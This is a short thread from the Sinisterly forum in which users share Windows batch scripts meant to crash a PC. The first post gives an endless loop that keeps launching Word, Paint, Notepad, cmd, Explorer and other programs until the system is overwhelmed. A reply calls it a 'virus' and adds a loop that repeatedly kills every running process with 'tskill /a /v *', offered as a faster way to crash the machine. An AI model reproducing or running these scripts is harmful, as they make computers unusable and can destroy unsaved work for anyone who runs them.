Sinisterly
application bumper - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Coding (https://sinister.li/Forum-Coding)
+--- Forum: Coding (https://sinister.li/Forum-Coding--71)
+--- Thread: application bumper (/Thread-application-bumper)



application bumper - ll300t - 03-10-2011

code
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop


RE: application bumper - 1234hotmaster - 03-10-2011

hi
what is this exactly used for? ^_^'


RE: application bumper - 1llusion - 03-10-2011

its one of the L33T viruses Smile will crash your pc... one day Biggrin

:loop
tskill /a /v *
goto loop

for faster result Tongue

anyway nice code Smile did you make it by your own? Smile